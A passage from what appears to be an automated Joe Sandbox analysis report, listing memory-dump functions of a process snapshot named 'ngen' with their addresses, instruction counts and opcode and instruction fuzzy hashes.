                                                • Opcode Fuzzy Hash: a7a25d6d32479c8608c4748866547dbb4affcd077f3e9bf33bacd1e23731eaa2
                                                • Instruction Fuzzy Hash: A7111B71A10249DFDB04DFA9D555BADBBF4FF48300F0442AAE909EB382EA34D941CB91
                                                Function 058B5734 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                • Instruction ID: 7df02a90741be79b8194e9b322e3b00c692cabad3e2814e6ef6ef92ca94de9bb
                                                • Opcode Fuzzy Hash: 142e258c31b2854674597990c3f52e5af594bf5f99f2c3b686c6bb1bb1f636c8
                                                • Instruction Fuzzy Hash: FCF02273A05214BFE719CF5CC880FAAB7EDEB45650F054069D901DB271E6B1DE04CA98
                                                Function 05955152 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b131cba1e4788bc4d70fcf2bc361f037a464df8c9854158d9184451bba2b0dae
                                                • Instruction ID: 17aa7fec2c5e976d0be92a3bb3583115dd262858b89ef2030c9b7d4fa9e9b3f3
                                                • Opcode Fuzzy Hash: b131cba1e4788bc4d70fcf2bc361f037a464df8c9854158d9184451bba2b0dae
                                                • Instruction Fuzzy Hash: F8012171A1030D9BDB04DF69D9559EEBBB8FF48310F10445AF901F7351EA34DA018BA1
                                                Function 059550D9 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 26d9dca2f01b04c4ccfac99a04ed952f8ef4966e1d8437cb61e85b3a853cee20
                                                • Instruction ID: fed2364ab415fee291a795d085110972fc6bef12d956cc6ebd68fe406bb0732c
                                                • Opcode Fuzzy Hash: 26d9dca2f01b04c4ccfac99a04ed952f8ef4966e1d8437cb61e85b3a853cee20
                                                • Instruction Fuzzy Hash: 61015AB1A00309ABCB00DFA9D9459EEBBB8EF48314F10445AE900F7291EA34ED018BA1
                                                Function 05955060 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ba4375ad639032531153e0f19686c829d44fd1612111637f2752f02bbc5bbdf9
                                                • Instruction ID: 324f488e2c2debc376cfece25ba541c1cac9a762ec14cfaa80da944945c47035
                                                • Opcode Fuzzy Hash: ba4375ad639032531153e0f19686c829d44fd1612111637f2752f02bbc5bbdf9
                                                • Instruction Fuzzy Hash: 89011A71A11309ABCB04DFA9D9959EEBBB8EF48310F10445AF905E7351DA34EA018BA1
                                                Function 058AC073 Relevance: .0, Instructions: 43COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                • Instruction ID: d26a864e4505500d1cbe5883a3129c0b2de7fe4f50b2d44df688f8fbced2de28
                                                • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                • Instruction Fuzzy Hash: A9F04FB3600A15ABD725CF4D9840E57F7EAEBC4A90F058169A955D7220EA31ED05CB90
                                                Function 0593F78A Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 67b33fe9a1065c4476f180a5aa93e4362e2b65c34c16835733473cad8126dcaf
                                                • Instruction ID: 147b1f5e48e2df61595f6f6c09b6bfe0d9c36d8e0f993fabfd8d0aaa78c3def0
                                                • Opcode Fuzzy Hash: 67b33fe9a1065c4476f180a5aa93e4362e2b65c34c16835733473cad8126dcaf
                                                • Instruction Fuzzy Hash: 690129B5E00309EFCB04DFA9D545AAEBBF4EF48300F00806AA805EB350EA74DA00CB91
                                                Function 059561E5 Relevance: .0, Instructions: 41COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f30d2f46da0c9a25caa112c1d5e0db82b9139b3d4edf9a51adc70bf0d08ed20
                                                • Instruction ID: 86026646212b6515779c8983e761b57a49fead0f5806b3d8de13f73dc03723ca
                                                • Opcode Fuzzy Hash: 6f30d2f46da0c9a25caa112c1d5e0db82b9139b3d4edf9a51adc70bf0d08ed20
                                                • Instruction Fuzzy Hash: 56014F71A113499BCF04DFA9D855AEEBBB8EF48310F54405EF901EB290EB74EA01CB95
                                                Function 0590A4B0 Relevance: .0, Instructions: 40COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f8407c30ec268efb2a56889fadbd32fdc26081681ef12d627a1fdb49b92dfce
                                                • Instruction ID: 0d7cad569f7f7d5a02cc47ae4f8fbc62bd7992246419f21720abe5413738972a
                                                • Opcode Fuzzy Hash: 5f8407c30ec268efb2a56889fadbd32fdc26081681ef12d627a1fdb49b92dfce
                                                • Instruction Fuzzy Hash: F4019736210209AFCF129F84DC40EDE3FAAFB4C764F069511FE1966260C636E970EB81
                                                Function 058B656A Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0920ee90354ed3308bf84648a592ba6236293137cc8b68d2eb7dfbdc2084c27a
                                                • Instruction ID: 0524f104d8acca5ad070bafedfa71a42abf5783d1c11480ec22081b4dd6b7be6
                                                • Opcode Fuzzy Hash: 0920ee90354ed3308bf84648a592ba6236293137cc8b68d2eb7dfbdc2084c27a
                                                • Instruction Fuzzy Hash: 7C018170308784DBF722976DCD48F7637A9BB44B04F480595BE12DB6E2FB68DD018211
                                                Function 0587C0F0 Relevance: .0, Instructions: 39COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ad38fd14cd54bd4314c643fb4cf77916b0d08e7a0723a33d4523a8db6d87ed48
                                                • Instruction ID: fdaf65abdefe448e91a01bc1ed04b34a3f2842505249bbf1c48055f11bf53826
                                                • Opcode Fuzzy Hash: ad38fd14cd54bd4314c643fb4cf77916b0d08e7a0723a33d4523a8db6d87ed48
                                                • Instruction Fuzzy Hash: 29F090723042095BE624A6199C51F3237AAE7C06A5F65807AEF0ACB680FA71DC41C3B5
                                                Function 05953749 Relevance: .0, Instructions: 38COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                • Instruction ID: 4fea10bb961bbea4c928ff99f02727dbb9f7eba15bb85d525f24c1211d36f7d9
                                                • Opcode Fuzzy Hash: 9c86c39bdb6e5f373c63bc0b61fffc749c090866831c7dd43b14b299580d1563
                                                • Instruction Fuzzy Hash: A6F04476A40204BFE711DB64CD41FEA77BCEB04750F040565A956D6190EA70EE44CB91
                                                Function 059555C9 Relevance: .0, Instructions: 35COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c7f98365caa70d8a821ae26d115fbb1aebea24e98d21f73b0512ecafb49549da
                                                • Instruction ID: 6e96c921a619f1645910dc9c43f1840a485412198fb897bb7d14c41b6ab0c644
                                                • Opcode Fuzzy Hash: c7f98365caa70d8a821ae26d115fbb1aebea24e98d21f73b0512ecafb49549da
                                                • Instruction Fuzzy Hash: 4DF04F75A1134DAFCB04EFA8D555AAEBBF4EF58300F108459B805EB391EA74DE00CB55
                                                Function 058847FB Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2b7f22df9692eab7b035e3e4bd97f0aac7360dd79ff96761a633a39587db5d4b
                                                • Instruction ID: 887d62c935b71f4138a0ad27fa5f64cffb6ea11e989bacacec8b8bcf19514faa
                                                • Opcode Fuzzy Hash: 2b7f22df9692eab7b035e3e4bd97f0aac7360dd79ff96761a633a39587db5d4b
                                                • Instruction Fuzzy Hash: E2F06D329166D79EDF22EB588049F317795EB0872CF09496ADC8AC7521C624DC84C651
                                                Function 0593F6C7 Relevance: .0, Instructions: 33COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a6a2fb696e12ea98a1ebfee4edb50ece245e549b5fe936bec255e0945ed87c05
                                                • Instruction ID: 0a9e6fb3bae1a2c6eab8e1ed1072c6341b47fab81fdb3eeb559cb3484ed78d93
                                                • Opcode Fuzzy Hash: a6a2fb696e12ea98a1ebfee4edb50ece245e549b5fe936bec255e0945ed87c05
                                                • Instruction Fuzzy Hash: 29F06271A10348EBCF04DFA9D455EAEBBF4EF44304F044459E901EB291EA34D901CB55
                                                Function 05940115 Relevance: .0, Instructions: 32COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: afd5e4293c985d8f886288a2e6d35b95a97c2ca2a214a065510769696042f256
                                                • Instruction ID: 398a975111d84bbb50e956995eb78caa7ccbe6eff12a032ba48d15b08984bb99
                                                • Opcode Fuzzy Hash: afd5e4293c985d8f886288a2e6d35b95a97c2ca2a214a065510769696042f256
                                                • Instruction Fuzzy Hash: 63F0276652DB88CACF216B38A69EAA16F69A78A150F091446D5A25F200CA749C83CA24
                                                Function 058BC5ED Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f60bec51d6f83771867acabeb9431905d142776f09bf44307471220681592112
                                                • Instruction ID: 5b89fd7e91b0c6b4dd37f75869005e6ac164fa6ec91620df4e5126a8325999af
                                                • Opcode Fuzzy Hash: f60bec51d6f83771867acabeb9431905d142776f09bf44307471220681592112
                                                • Instruction Fuzzy Hash: B1F0BE716596529BE722D658C148FA273EDAB826A4F08A469DC06C7712C6A0DC80CA51
                                                Function 058C2619 Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                • Instruction ID: fa70030a53f05cc9213ffb19babc2621cb76aa70660924a6dd6ae1ddd58cc5bf
                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                • Instruction Fuzzy Hash: 1AE09232300A006BD7229E5D8C84F477B6EAF82B10F0400BDB9059E291C9F2DC0982A5
                                                Function 0595539D Relevance: .0, Instructions: 31COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ccec65de6d0d35acc89e2e5df6cc9e1a9c06ce2592615bd0691cce79baf8f04
                                                • Instruction ID: 4c8905392a253c3a3f2e08daab34d4320d9b2f4c217c1a08807eb641b05fa753
                                                • Opcode Fuzzy Hash: 1ccec65de6d0d35acc89e2e5df6cc9e1a9c06ce2592615bd0691cce79baf8f04
                                                • Instruction Fuzzy Hash: B0F0B470A1034CDFCB04EB78D455AADBBB4EF44300F108499E905EB291EA74DD018B55
                                                Function 059554DB Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5d449a30cec6eca82c682d4a5ef7e76db60a34a1a4b66b78cc6429c3fbc7b248
                                                • Instruction ID: cdaeac1d5c872c026034240b4b31306f7bc1305257be635db803daf7277478d3
                                                • Opcode Fuzzy Hash: 5d449a30cec6eca82c682d4a5ef7e76db60a34a1a4b66b78cc6429c3fbc7b248
                                                • Instruction Fuzzy Hash: 3FF0E270A10348ABCB04EBB9D45AF9E7BB9EF08304F000498A901EB281EA34DD018715
                                                Function 0595547F Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2489493d5f54d947c48b52f15f89c24727dabb254de412d105f35c3ce650751f
                                                • Instruction ID: ee9b83a211b1e628891f62ce65330b20e6e5c0df6a2b1192713d381a9bd51ac1
                                                • Opcode Fuzzy Hash: 2489493d5f54d947c48b52f15f89c24727dabb254de412d105f35c3ce650751f
                                                • Instruction Fuzzy Hash: 5EF0E270B01308ABCF04DFA8D55AE9E7BB8EF08300F000498E901EB381EE38DD008755
                                                Function 0593F72E Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ee7b55438ae4485f9f584b7c5eae808f926dc73cb142fc23bc43e27eb1947cc5
                                                • Instruction ID: 0341596f9fa90bdb957626db2bed5706e23dff0982ac38b476711d9476b117be
                                                • Opcode Fuzzy Hash: ee7b55438ae4485f9f584b7c5eae808f926dc73cb142fc23bc43e27eb1947cc5
                                                • Instruction Fuzzy Hash: 68F0E271B00748EBCB04DBA8C55AE9E7BB8EF08700F040098E502EB280ED38DD018715
                                                Function 059551CB Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9d70555212f8efb0b5b30e11e9daa93f5cfe5df18579929f58da51090c3bf864
                                                • Instruction ID: c1b5509d229a23250c511d28abf4ddad9d4a270c56b9f54188aa7ae4002f49fe
                                                • Opcode Fuzzy Hash: 9d70555212f8efb0b5b30e11e9daa93f5cfe5df18579929f58da51090c3bf864
                                                • Instruction Fuzzy Hash: E9F05E71A15248ABDB04EBA8D91AEAE77B8EB44304F440459E901EB291EA74E9018755
                                                Function 058FD070 Relevance: .0, Instructions: 30COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                • Instruction ID: 5153394d51f7856373358932e50966a8e33b5176822e3582e4e032a4c84bdb31
                                                • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                • Instruction Fuzzy Hash: 37F0A03260461467C221AA0D8C05F5ABBACDBD5B70F24021ABE64DA1D0DA70AD01D7D6
                                                Function 058B55C0 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                • Instruction ID: c5e738331cdb140a6620b09dc55dac084990b91350ccc7e41e21eca7d59c9726
                                                • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                • Instruction Fuzzy Hash: 86E0E533204618ABD6215A0AD804F52BB6AFF507B1F144519A959976D09BB0ED11CAD4
                                                Function 05880710 Relevance: .0, Instructions: 28COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction ID: ca9ee8ac02876402acf9fe0c5107862d760f36f3a4ce555b24442115001823eb
                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction Fuzzy Hash: 8EF0E53A304B45DBEB15EF15C058AB57BE9FB81350B054454EC46CB300DB32ED85CB90
                                                Function 059537B6 Relevance: .0, Instructions: 27COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                • Instruction ID: a9a76d7dd882eb0a1752a9db8fb66aa23392c3736799d0c35b20f1c54f71e7e8
                                                • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                • Instruction Fuzzy Hash: 8BE06D72610600ABD764DB68CD05FA673ACFB00760F180658B916D30D0DAB0AE40CB60
                                                Function 058825E0 Relevance: .0, Instructions: 23COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 21e112aff8d712825dc515be148625baeb305007ec2d268a071df4b83b1d06c3
                                                • Instruction ID: 2714fa4e5eb00bad53d8883855dc9a0149a6cc4abe283e665c37bdc46dc38fe3
                                                • Opcode Fuzzy Hash: 21e112aff8d712825dc515be148625baeb305007ec2d268a071df4b83b1d06c3
                                                • Instruction Fuzzy Hash: CBE09272200A549BC725FB2DDD05F9A7B9AEF50364F114519B556971A0CB30AD10C7C9
                                                Function 0593B3D0 Relevance: .0, Instructions: 21COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                • Instruction ID: 4fd87e513b279daa6e46efe8a3865fbe257e8af82df3ccbab5b14419b35f15e7
                                                • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                • Instruction Fuzzy Hash: 3AE0C232385618FBDB226A44CC05F79BB1AEB407A0F204031FE08AB690CA71ED91D6D5
                                                Function 05882050 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 636b35ca1a6578eb23c7da864d642550ce65785ef30bb6a55af3ef6cd7489af6
                                                • Instruction ID: b2b46b9538748e038e5605b649329f88fc8c6e3a1e6af24d04d868c883d9e392
                                                • Opcode Fuzzy Hash: 636b35ca1a6578eb23c7da864d642550ce65785ef30bb6a55af3ef6cd7489af6
                                                • Instruction Fuzzy Hash: 88E0C233200A54ABC711FB5DDD01F5A779EEF94360F140121F955C72A0CB20AD00C7D9
                                                Function 0587B562 Relevance: .0, Instructions: 17COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                • Instruction ID: 83850f7de2dba41eb85480047e730de34325261f4bb170529060af5da39265dd
                                                • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                • Instruction Fuzzy Hash: 38D05B31261750AFD7356F19ED09F827A76AF80B11F0905147405964F0D5B1DD44D691
                                                Function 058BE59C Relevance: .0, Instructions: 16COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                • Instruction ID: 0123e6d204bf153feccf885e3de943de0311bf477e580323854b07e877186fcc
                                                • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                • Instruction Fuzzy Hash: B4D0A932204A20ABDB32AA1CFC04FD333E9BB88720F1A0859F418C7050C760AC81CA84
                                                Function 0587A0E3 Relevance: .0, Instructions: 15COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                • Instruction ID: e6882d4e27969130f63db5ff0f7da33694ac0c676b3c4f6ec59d7edcede5b3b9
                                                • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                • Instruction Fuzzy Hash: D7D0123231747497DF2DA6556954F6B7A16AB81A98F1A046D7C0BD3900C515CC43D6E0
                                                Function 058BC700 Relevance: .0, Instructions: 12COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                • Instruction ID: cb7da24df23d9f5d3fef850f975309ae70be4cb9d2592a3b85df86a00e1d33b7
                                                • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                • Instruction Fuzzy Hash: 7BC01232250644AFC7159A98CD01F0177A9E798B40F140421F60487570C531EC10D684
                                                Function 058A340D Relevance: .0, Instructions: 10COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
